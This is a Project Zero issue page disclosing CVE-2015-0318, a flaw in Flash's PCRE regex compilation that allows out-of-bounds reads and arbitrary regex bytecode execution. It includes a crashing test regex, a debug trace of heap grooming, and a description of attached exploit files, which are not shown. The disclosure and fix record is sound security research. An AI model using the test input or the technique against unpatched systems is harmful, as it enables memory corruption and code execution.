Monorail Project: project-zero Issues People Development process History Sign in
New issue
Advanced search Search tips
Note: Color blocks (like or ) mean that a user may not be available. Tooltip shows the reason.
Starred by 4 users
Status: Fixed
Owner:
Email to this user bounced
Closed: Feb 2015
Cc:



Sign in to add a comment
Flash PCRE regex compilation logic issue
Project Member Reported by markbrand@google.com, Nov 25 2014 Back to list
There’s a logic error in the PCRE engine version used in Flash that allows the execution of arbitrary PCRE bytecode, with potential for memory corruption and RCE. 

The issue is in the handling of the \c escape sequence (single ascii character) when followed by a multibyte utf8 character. The resulting bytecode will be treated differently by several code paths in pcre_compile.cpp, resulting in several interesting possibilities.

Simplest testcase that will crash in an ASAN build of of avmshell is the following:

\\c\xd0\x80+(?1)

The first component is a forced-ascii literal, which then takes the first byte of our multibyte character

\       <---- start of escape sequence
c       <---- single ascii character
\xd0    <---- this must be our ascii character

\x80    <---- look, another single character
+       <---- simplify this expression to a repeated \x80

At this point, our emitted bytecode is the following:

OP_BRA  <---- (1) standard opening for start of regex
OP_CHAR <---- (2) one character
\xd0
OP_PLUS <---- (3) one character, repeated
\x80

Now when we get to (?1), we need to search for group number one. The search proceeds as follows:

OP_BRA  <---- (1) this is not our group, it doesn't capture

OP_CHAR <---- (2) a character, we need to check if it's multibyte
\xd0    <------------- it's a multibyte utf8 character
OP_PLUS <------------- better skip the second byte

\x80    <---- (3) don't know this one - let's go look up how long it is in our lookup table...

Highest opcode is 109, so we read off the end of the lookup table.

We can abuse this on a normal non-ASAN build; after the array is a table of strings; and _pcre_OP_length[0x80] will return us an instruction length of 110

+ 110   <---- (4) somewhere on the heap...

Search then proceeds until we find the right bytecode for the group we were looking for, or finds OP_END or a NULL. It then fills in the opcode for a jump out to where it found that group.

See attached for an execution trace demonstrating a heap-groom and arbitrary regex bytecode execution (the regex used is slightly different to the above poc). Prior to this trace, a groom has been performed to leave a gap of size 335 followed by a crafted buffer.

compile_branch  <---- first compile to establish length of regex
start_byte 41 (A)
start_byte 41 (A)
… snip …
start_byte 41 (A)
start_byte 41 (A)
start_byte 28 (()
compile_branch
start_byte 5c (\)
start_byte 80 (�)
start_byte 2a (*)
start_byte 29 ())
start_byte 3f (?)
start_byte 28 (()
start_byte 00 ()
malloc(335) [0x602a0001c8e0 - 0x602a0001ca2f] <--- note legitimate buffer ends at ca2f
compile_branch <---- second compile to produce regex bytecode in the buffer allocated above
start_byte 41 (A)
start_byte 41 (A)
… snip ...
start_byte 41 (A)
start_byte 41 (A)
start_byte 28 (()
compile_branch
start_byte 5c (\)
start_byte 80 (�)
start_byte 2a (*)
start_byte 29 ())
start_byte 3f (?)
start_byte 28 (()
from here1
code 0x602a0001c910 93 3 <---- print in find_bracket, last no. is _pcre_OP_lengths[c]
code 0x602a0001c913 27 2
code 0x602a0001c915 27 2
… snip ...
code 0x602a0001ca0f 27 2
code 0x602a0001ca11 27 2
code 0x602a0001ca13 102 1
code 0x602a0001ca14 94 1
code 0x602a0001ca19 27 2
code 0x602a0001ca1c 30 2
code 0x602a0001ca1e 128 110 <---- whoops
code 0x602a0001ca8c 35 2    <---- now outside legitimate heap buffer
code 0x602a0001ca8e 35 2
… snip ...
exec 0x602a0001c910 93 [0x601a0000cea0] <--- regex execution starts
exec 0x602a0001c913 27 [0x601a0000cea0]
exec 0x602a0001c915 27 [0x601a0000cea1]
… snip ....
exec 0x602a0001ca0f 27 [0x601a0000cf1e]
exec 0x602a0001ca11 27 [0x601a0000cf1f]
exec 0x602a0001ca13 102 [0x601a0000cf20]
exec 0x602a0001ca14 94 [0x601a0000cf20]
exec 0x602a0001ca19 27 [0x601a0000cf20]
exec 0x602a0001ca22 92 [0x601a0000cf20]
exec 0x602a0001ca25 81 [0x601a0000cf20]
exec 0x602a0001cae9 35 [0x601a0000cf20] <--- regex execution in our buffer of ‘#’
exec 0x602a0001caeb 35 [0x601a0000cf20]

A patch for this issue against the github avmplus source is attached.

This bug is subject to a 90 day disclosure deadline. If 90 days elapse
without a broadly available patch, then the bug report will automatically
become visible to the public.

 
cunicode.patch
433 bytes Download
Comment 1 by cevans@google.com, Nov 28 2014
Labels: Id-3161
Owner: cevans@google.com
[Setting owner to cevans@google.com. I think we should use owner to represent whoever is doing the comms with the vendor]
Project Member Comment 2 by markbrand@google.com, Dec 17 2014
Updating with additional information sent to vendor in response to request for a crash repro:

It's quite an awkward bug to provide a reliable crash repro for, as with the way the Flash heap works the out-of-bounds reads will almost always result in a silent failure to compile the regex - to get a crash directly from this issue you will need good instrumentation such as ASAN. One way to see that the bug has occurred is to instrument find_bracket in pcre_compile.cpp to print the pointer that it's currently dereferencing, something like changing the start of the function to:

static const uschar *
find_bracket(const uschar *code, BOOL utf8, int number)
{
for (;;)
  {
    register int c = *code;
    fprintf(stderr, "code %p %i\n", code, c);
    if (c == OP_END) return NULL;

The example shown wasn't being triggered from actionscript though, it was a custom harness to test the regex engine, so I don't have an abc to hand. The provided regex should cause an OOB read crash under ASAN or valgrind though when called from the RegExp object.

See attached for a partial exploit for this issue in desktop Flash; it uses this vulnerability to get arbitrary bytecode executed (in CompileRegex), and then leverages this to corrupt the length of a Vector.<uint> object on the heap. The provided file will then use this corrupted vector object to write the value 0x41414141 to address 0x40404040. As it requires some heap manipulation, mileage may vary - this has only been tested on the standard Flash on Windows 8.1 x64 running in 32-bit desktop Internet Explorer on my laptop.
poc.7z
11.0 KB Download
Project Member Comment 3 by markbrand@google.com, Dec 18 2014
Supplied another crash poc to adobe.
psirt-3161.tar.gz
2.0 KB Download
Comment 4 by cevans@google.com, Feb 4 2015
Labels: CVE-2015-0318
Comment 5 by cevans@google.com, Feb 6 2015
Labels: Fixed-2015-Feb-5
Status: Fixed
https://helpx.adobe.com/security/products/flash-player/apsb15-04.html
Comment 6 by cevans@google.com, Feb 12 2015
Labels: -Restrict-View-Commit -Severity-Moderate Severity-High
Making publicly viewable; it's 7 days post-patch and there's a corresponding blog post: http://googleprojectzero.blogspot.com/2015/02/exploitingscve-2015-0318sinsflash.html

Also fixing severity to "High"
Project Member Comment 7 by markbrand@google.com, Feb 17 2015
Adding the exploit source for the blog post, as it was pointed out that I forgot to upload it...

Exploit has only been tested on 32-bit desktop IE running on Windows 8.1.
src.tar.gz
8.8 KB Download
Why when I running "\\c\xd0\x80+(?1)" in pcre 7.2 or 7.2 or 7.1 all just failed and said "Failed: reference to non-existent subpattern at offset 15"..Anyone was able to reproduce it?
Sign in to add a comment